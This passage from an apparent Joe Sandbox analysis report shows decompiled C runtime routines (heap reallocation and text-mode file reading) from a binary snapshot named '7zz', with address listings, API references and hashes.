				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x47c878);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x496584; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x493730 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = L0046E8D6(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0046E56A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = L0046F866(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x496580, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x49015c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = L0046FC2E(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = L0046F902(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E0046C5C0(_v40, _a4, _t74);
													L0046F8BD(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x496580, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E0046C5C0(_v40, _t97, _t68);
												L0046F8BD(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E0046CC23();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = L0046E8D6(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0046E56A(9);
							_v8 = _t113;
							_t80 = L0046EB0B(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0046CAD5();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x49657c; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = L0046F314();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = L0046EE5F();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E0046C5C0(_v40, _t97, _t91);
										_t93 = L0046EB0B(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										L0046EB36();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x496580, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E0046C5C0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									L0046EB36();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = L0046E8D6(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E0046C0FF(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = L0046BFC5(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                                                                                  0x0046c94d
                                                                                  0x0046c94f
                                                                                  0x0046c954
                                                                                  0x0046c95f
                                                                                  0x0046c960
                                                                                  0x0046c967
                                                                                  0x0046c96d
                                                                                  0x0046c970
                                                                                  0x0046c974
                                                                                  0x0046c984
                                                                                  0x0046c987
                                                                                  0x0046c989
                                                                                  0x0046c997
                                                                                  0x0046c99c
                                                                                  0x0046c99f
                                                                                  0x0046cade
                                                                                  0x0046cae1
                                                                                  0x0046cc2e
                                                                                  0x0046cc2e
                                                                                  0x0046cc30
                                                                                  0x0046cc33
                                                                                  0x0046cc35
                                                                                  0x0046cc37
                                                                                  0x0046cc3b
                                                                                  0x0046cc3b
                                                                                  0x0046cc3f
                                                                                  0x0046cc3f
                                                                                  0x0046cc4b
                                                                                  0x0046cc4b
                                                                                  0x0046cc51
                                                                                  0x0046cc53
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc55
                                                                                  0x0046cc5b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc5e
                                                                                  0x0046cc64
                                                                                  0x0046cc66
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc66
                                                                                  0x00000000
                                                                                  0x0046cc2e
                                                                                  0x0046cae7
                                                                                  0x0046caea
                                                                                  0x0046caec
                                                                                  0x0046caee
                                                                                  0x0046cafa
                                                                                  0x0046caf0
                                                                                  0x0046caf3
                                                                                  0x0046caf3
                                                                                  0x0046cafb
                                                                                  0x0046cafb
                                                                                  0x0046cafe
                                                                                  0x0046cafe
                                                                                  0x0046cb01
                                                                                  0x0046cb04
                                                                                  0x0046cb0c
                                                                                  0x0046cb11
                                                                                  0x0046cb12
                                                                                  0x0046cb22
                                                                                  0x0046cb27
                                                                                  0x0046cb2a
                                                                                  0x0046cb2c
                                                                                  0x0046cb2f
                                                                                  0x0046cb31
                                                                                  0x0046cbf1
                                                                                  0x0046cb37
                                                                                  0x0046cb37
                                                                                  0x0046cb3d
                                                                                  0x0046cb41
                                                                                  0x0046cb4c
                                                                                  0x0046cb51
                                                                                  0x0046cb54
                                                                                  0x0046cb56
                                                                                  0x0046cb61
                                                                                  0x0046cb67
                                                                                  0x0046cb6a
                                                                                  0x0046cb6c
                                                                                  0x0046cb71
                                                                                  0x0046cb74
                                                                                  0x0046cb77
                                                                                  0x0046cb79
                                                                                  0x0046cb7b
                                                                                  0x0046cb7b
                                                                                  0x0046cb84
                                                                                  0x0046cb90
                                                                                  0x0046cb95
                                                                                  0x0046cb95
                                                                                  0x0046cb58
                                                                                  0x0046cb5b
                                                                                  0x0046cb5b
                                                                                  0x0046cb98
                                                                                  0x0046cb98
                                                                                  0x0046cb9b
                                                                                  0x0046cb9f
                                                                                  0x0046cbaa
                                                                                  0x0046cbb0
                                                                                  0x0046cbb3
                                                                                  0x0046cbb5
                                                                                  0x0046cbba
                                                                                  0x0046cbbd
                                                                                  0x0046cbc0
                                                                                  0x0046cbc2
                                                                                  0x0046cbc4
                                                                                  0x0046cbc4
                                                                                  0x0046cbcb
                                                                                  0x0046cbd7
                                                                                  0x0046cbdc
                                                                                  0x0046cbdc
                                                                                  0x0046cbb5
                                                                                  0x0046cb9f
                                                                                  0x0046cbf4
                                                                                  0x0046cbf4
                                                                                  0x0046cbf4
                                                                                  0x0046cbf8
                                                                                  0x0046cbf8
                                                                                  0x0046cbfd
                                                                                  0x0046cc00
                                                                                  0x0046cc02
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc04
                                                                                  0x0046cc0a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc0d
                                                                                  0x0046cc13
                                                                                  0x0046cc15
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cc1b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046c9a5
                                                                                  0x0046c9a5
                                                                                  0x0046c9a5
                                                                                  0x0046c9a8
                                                                                  0x0046c9ab
                                                                                  0x0046caa2
                                                                                  0x0046caa2
                                                                                  0x0046caa5
                                                                                  0x0046caa7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046caad
                                                                                  0x0046cab3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046cab3
                                                                                  0x0046c9b3
                                                                                  0x0046c9b9
                                                                                  0x0046c9bd
                                                                                  0x0046c9c3
                                                                                  0x0046c9c6
                                                                                  0x0046c9c8
                                                                                  0x0046ca72
                                                                                  0x0046ca72
                                                                                  0x0046ca76
                                                                                  0x0046ca7b
                                                                                  0x0046ca7e
                                                                                  0x0046ca80
                                                                                  0x0046ca82
                                                                                  0x0046ca86
                                                                                  0x0046ca86
                                                                                  0x0046ca8a
                                                                                  0x0046ca8a
                                                                                  0x0046ca8d
                                                                                  0x0046ca9f
                                                                                  0x0046ca9f
                                                                                  0x00000000
                                                                                  0x0046ca7e
                                                                                  0x0046c9ce
                                                                                  0x0046c9d4
                                                                                  0x0046c9d6
                                                                                  0x0046c9d7
                                                                                  0x0046c9d8
                                                                                  0x0046c9d9
                                                                                  0x0046c9de
                                                                                  0x0046c9e1
                                                                                  0x0046c9e3
                                                                                  0x0046c9ea
                                                                                  0x0046c9eb
                                                                                  0x0046c9f1
                                                                                  0x0046c9f4
                                                                                  0x0046c9f6
                                                                                  0x0046c9fb
                                                                                  0x0046c9fc
                                                                                  0x0046c9ff
                                                                                  0x0046ca01
                                                                                  0x0046ca03
                                                                                  0x0046ca03
                                                                                  0x0046ca0a
                                                                                  0x0046ca10
                                                                                  0x0046ca15
                                                                                  0x0046ca18
                                                                                  0x0046ca19
                                                                                  0x0046ca1a
                                                                                  0x0046ca1f
                                                                                  0x0046ca1f
                                                                                  0x0046c9e5
                                                                                  0x0046c9e5
                                                                                  0x0046c9e5
                                                                                  0x0046c9e3
                                                                                  0x0046ca22
                                                                                  0x0046ca25
                                                                                  0x0046ca27
                                                                                  0x0046ca29
                                                                                  0x0046ca2d
                                                                                  0x0046ca2e
                                                                                  0x0046ca2e
                                                                                  0x0046ca34
                                                                                  0x0046ca37
                                                                                  0x0046ca42
                                                                                  0x0046ca48
                                                                                  0x0046ca4b
                                                                                  0x0046ca4d
                                                                                  0x0046ca52
                                                                                  0x0046ca53
                                                                                  0x0046ca56
                                                                                  0x0046ca58
                                                                                  0x0046ca5a
                                                                                  0x0046ca5a
                                                                                  0x0046ca61
                                                                                  0x0046ca66
                                                                                  0x0046ca67
                                                                                  0x0046ca6a
                                                                                  0x0046ca6f
                                                                                  0x0046ca6f
                                                                                  0x0046ca4d
                                                                                  0x00000000
                                                                                  0x0046cab9
                                                                                  0x0046caba
                                                                                  0x0046cac0
                                                                                  0x0046cac0
                                                                                  0x00000000
                                                                                  0x0046c98b
                                                                                  0x0046c98c
                                                                                  0x0046cc68
                                                                                  0x0046cc68
                                                                                  0x0046cc68
                                                                                  0x00000000
                                                                                  0x0046cc68
                                                                                  0x0046c976
                                                                                  0x0046c979
                                                                                  0x0046cc6a
                                                                                  0x0046cc6d
                                                                                  0x0046cc78
                                                                                  0x0046cc78

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
                                                                                  • Instruction ID: 17e87dca6aaccdebba4e5c35270bbda758384f6f49e70602d0c86d8a415a7f21
                                                                                  • Opcode Fuzzy Hash: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
                                                                                  • Instruction Fuzzy Hash: 459109B1D00118ABDB21EB65DCC5ABE7BB4EB45764F200127F899B6290F7398D40C76E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0047143F Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0047143F(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x496460 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x496460 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t20 = _t108 + 1; // 0x4
						_t119 = _t20;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E004716C1(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E004705D3(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00470646())) = 9;
				_t103 = E0047064F();
				 *_t103 = _t125;
				goto L10;
			}




































                                                                                  0x00471445
                                                                                  0x0047144e
                                                                                  0x00471453
                                                                                  0x00471455
                                                                                  0x00471611
                                                                                  0x00471611
                                                                                  0x00000000
                                                                                  0x00471611
                                                                                  0x0047145b
                                                                                  0x00471463
                                                                                  0x00471470
                                                                                  0x00471477
                                                                                  0x0047147a
                                                                                  0x0047147c
                                                                                  0x00471482
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047148b
                                                                                  0x0047148d
                                                                                  0x00471492
                                                                                  0x00471494
                                                                                  0x00471497
                                                                                  0x0047149b
                                                                                  0x0047149b
                                                                                  0x0047149e
                                                                                  0x004714a5
                                                                                  0x004714a5
                                                                                  0x00471492
                                                                                  0x004714c1
                                                                                  0x004714fc
                                                                                  0x004714fe
                                                                                  0x00471501
                                                                                  0x00471504
                                                                                  0x00471504
                                                                                  0x00471508
                                                                                  0x0047150c
                                                                                  0x0047150e
                                                                                  0x0047160c
                                                                                  0x00000000
                                                                                  0x0047160c
                                                                                  0x00471514
                                                                                  0x00471516
                                                                                  0x00471521
                                                                                  0x00471521
                                                                                  0x00471521
                                                                                  0x00471523
                                                                                  0x00471523
                                                                                  0x00471525
                                                                                  0x0047152b
                                                                                  0x0047152e
                                                                                  0x00471530
                                                                                  0x00471532
                                                                                  0x00471535
                                                                                  0x00471606
                                                                                  0x00471606
                                                                                  0x00471606
                                                                                  0x00471609
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047153b
                                                                                  0x0047153b
                                                                                  0x0047153e
                                                                                  0x00471540
                                                                                  0x00471542
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471548
                                                                                  0x0047154a
                                                                                  0x00471558
                                                                                  0x0047155b
                                                                                  0x0047157b
                                                                                  0x00471589
                                                                                  0x0047158f
                                                                                  0x00471591
                                                                                  0x0047159d
                                                                                  0x0047159d
                                                                                  0x004715a1
                                                                                  0x004715e4
                                                                                  0x004715e4
                                                                                  0x004715e7
                                                                                  0x004715e7
                                                                                  0x004715e7
                                                                                  0x004715e8
                                                                                  0x004715e8
                                                                                  0x004715eb
                                                                                  0x004715ee
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004715f4
                                                                                  0x004715a3
                                                                                  0x004715a5
                                                                                  0x004715aa
                                                                                  0x004715bf
                                                                                  0x004715c2
                                                                                  0x004715cf
                                                                                  0x004715d6
                                                                                  0x004715db
                                                                                  0x004715de
                                                                                  0x004715e2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004715e2
                                                                                  0x004715c4
                                                                                  0x004715c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004715ca
                                                                                  0x004715ca
                                                                                  0x00000000
                                                                                  0x004715ca
                                                                                  0x004715ac
                                                                                  0x004715af
                                                                                  0x004715b1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004715b3
                                                                                  0x004715b8
                                                                                  0x004715b9
                                                                                  0x00000000
                                                                                  0x004715b9
                                                                                  0x00471593
                                                                                  0x00471599
                                                                                  0x0047159b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047159b
                                                                                  0x00471560
                                                                                  0x00471561
                                                                                  0x00471564
                                                                                  0x0047156c
                                                                                  0x0047156f
                                                                                  0x00471570
                                                                                  0x00000000
                                                                                  0x00471570
                                                                                  0x00471566
                                                                                  0x00000000
                                                                                  0x00471566
                                                                                  0x0047154c
                                                                                  0x0047154e
                                                                                  0x0047154f
                                                                                  0x00000000
                                                                                  0x0047154f
                                                                                  0x004715f8
                                                                                  0x004715fc
                                                                                  0x004715fe
                                                                                  0x00471600
                                                                                  0x00471602
                                                                                  0x00471602
                                                                                  0x00471604
                                                                                  0x00471604
                                                                                  0x00000000
                                                                                  0x00471600
                                                                                  0x00471518
                                                                                  0x0047151b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0047151d
                                                                                  0x00000000
                                                                                  0x0047151d
                                                                                  0x004714c3
                                                                                  0x004714cb
                                                                                  0x004714ce
                                                                                  0x004714e4
                                                                                  0x004714e7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004714ee
                                                                                  0x004714f4
                                                                                  0x00000000
                                                                                  0x004714f4
                                                                                  0x004714d5
                                                                                  0x004714db
                                                                                  0x004714e0
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 004714B9
                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 004714C3
                                                                                  • ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471589
                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 00471593
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 1948546556-0
                                                                                  • Opcode ID: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                                  • Instruction ID: 3acba76942d2db7199ab0c4a203b8ba3d5a06c5b05a066009057d9eb64363bcb
                                                                                  • Opcode Fuzzy Hash: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                                  • Instruction Fuzzy Hash: 5251D774A04285AFDF258FACC884BEA7BF0AF42304F14C49BE45A8B361D378D955CB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042D5F3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 98%
                                                                                  			E0042D5F3(void* __ecx, signed int __edx) {
				intOrPtr _t110;
				intOrPtr _t117;
				intOrPtr* _t118;
				void* _t122;
				signed int _t128;
				signed int _t132;
				signed int _t135;
				signed int _t139;
				intOrPtr _t148;
				signed int _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				void* _t177;
				signed int _t178;
				void* _t179;
				signed int* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				_t173 = __edx;
				L0046B890(0x4774e4, _t187);
				_t184 = __ecx;
				_t110 = E0042D241(__edx);
				_t148 =  *((intOrPtr*)(_t187 + 8));
				_t176 = _t110;
				E0040862D();
				E0040867E(_t148, _t176);
				 *(_t187 - 0x10) =  *(_t187 - 0x10) & 0x00000000;
				 *(_t187 - 0x1c) =  *(_t187 - 0x1c) & 0x00000000;
				if(_t176 <= 0) {
					L15:
					_t177 = _t148 + 0x14;
					 *((intOrPtr*)(_t187 + 8)) =  *(_t187 - 0x1c) - 1;
					E0040862D();
					_t155 = _t177;
					E0040867E(_t177,  *((intOrPtr*)(_t187 + 8)));
					_t117 =  *((intOrPtr*)(_t187 + 8));
					if(_t117 <= 0) {
						L18:
						_t178 =  *(_t187 - 0x10);
						if(_t178 <  *((intOrPtr*)(_t187 + 8))) {
							E0042D0F8(_t155);
						}
						_t179 = _t178 -  *((intOrPtr*)(_t187 + 8));
						_t156 = _t148 + 0x28;
						 *((intOrPtr*)(_t187 + 8)) = _t156;
						_t118 = E0040867E(_t156, _t179);
						if(_t179 != 1) {
							if(_t179 <= 0) {
								goto L36;
							} else {
								goto L35;
							}
							do {
								L35:
								_t118 = E00415C6D( *((intOrPtr*)(_t187 + 8)), E0042D241(_t173));
								_t179 = _t179 - 1;
							} while (_t179 != 0);
							goto L36;
						} else {
							_t186 = 0;
